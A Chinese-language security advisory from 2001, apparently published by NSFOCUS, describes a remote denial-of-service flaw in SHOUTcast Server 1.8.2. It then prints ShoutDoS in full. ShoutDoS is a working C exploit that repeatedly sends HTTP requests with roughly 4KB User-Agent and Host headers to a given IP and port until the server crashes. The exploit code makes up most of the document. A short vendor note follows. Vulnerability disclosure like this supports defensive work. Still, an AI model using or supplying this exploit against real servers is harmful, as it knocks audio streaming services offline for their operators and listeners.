首页 -> 安全研究
安全研究
安全漏洞
SHOUTcast Server远程拒绝服务漏洞
发布日期:2001-08-03
更新日期:2001-08-06
受影响系统:
描述:
nullsoft SHOUTcast Server 1.8.2
- Microsoft Windows NT/2000
- Linux
- Solaris 2.x
- FreeBSD 4.x
- MacOS
SHOUTcast Server是nullsoft公司开放的一个流式音频服务器。它可用于多种操作系统
平台上。
它存在一个安全漏洞,如果发送一些特殊格式的客户请求,SHOUTcast Server将会崩溃。
攻击者可以构造这样的HTTP请求,在"User-Agent"和"Host"域中分别设置成一个很长的字
符串(4KB),并多次提交请求,就可能使得SHOUTcast Server崩溃,停止提供音频服务。
<*来源:FraMe (frame@hispalab.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* ShoutDoS: Remote Denial of Service SHOUTcast Server
*
* ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
*
* Tested:
* SHOUTcast Server 1.8.2 Linux
* SHOUTcast Server 1.8.2 Win32
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>
void msg(void) {
printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");
printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");
}
int main(int argc,char **argv) {
int s,n=0,c;
struct sockaddr_in sa;
struct hostent *SHOUTserver;
char buffer[]="GET / HTTP/1.0\r\nUser-Agent: SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD
enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer
viceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTc
astDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialo
fServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHO
UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni
alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServic
eSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast
DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe
rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUT
castDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial
ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS
HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe
nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServ
icSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas
tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofS
erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOU
TcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenia
lofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService
SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD
enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer
viceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTc
astDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialo
fServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHO
UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni
alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServic
eSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast
DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe
rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUT
castDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial
ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS
HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe
nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServi
ceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas
tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofS
erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService\r\n
Host: your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.se
rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go
.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.
now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.you
r.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serve
r.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cr
ash.now.your.server..go.crash.now.your.server.go.crash.now.your.server.go.crash.no
w.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.
server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.
go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cras
h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y
our.server.go.crash.now.your.server.go.crash.now..your.server.go.crash.now.your.se
rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go
.crash.now.your.server.go.crash..now.your.server.go.crash.now.your.server.go.crash
.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.yo
ur.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv
er.go..crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.
crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.n
ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your
.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server
.go.crash.now.your.server.go.crash.now.your..server.go.crash.now.your.server.go.cr
ash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now
.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.s
erver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g
o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash
.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.yo
ur.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv
er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.c
rash.now.your.server.go.crash.now.your.server..go.crash.now.your.server.go.crash.n
ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your
.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server
.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cra
sh.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.
your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now..your.s
erver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g
o.crash.now.your.server.go.crash.now.your.server.go.crash..now.your.server.go.cras
h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y
our.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.ser
ver.go.crash.now.your.server.go..crash.now.your.server.go.crash.now.your.server.go
.crash.now\r\nAuthorization: Basic\r\n\r\n";
char rbuff[512];
if ( argc != 3 ) {
msg();
printf("Usage: %s ip port\n",*argv);
exit(1);
}
if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
msg();
printf("Error: gethostbyname()\n");
exit(1);
}
memcpy(&sa.sin_addr.s_addr,SHOUTserver->h_addr,SHOUTserver->h_length);
sa.sin_family = AF_INET;
sa.sin_port = htons(atoi(argv[2]));
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
msg();
printf("Error: socket()\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
msg();
printf("Error: connect()\n");
exit (1);
}
close(s);
msg();
printf("Connect. The host appears be up...\n");
printf("Doing DoS ");
DoS:
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
printf(" Error!\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
printf(" Server Crash!\n");
exit (1);
}
write(s,buffer,sizeof(buffer)-1);
read(s,rbuff,sizeof(rbuff));
close(s);
printf(".");
goto DoS; // Basic Power :)
}
/* EOF */
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.shoutcast.com/download/files.phtml
浏览次数:8845
严重程度:0(网友投票)
绿盟科技给您安全的保障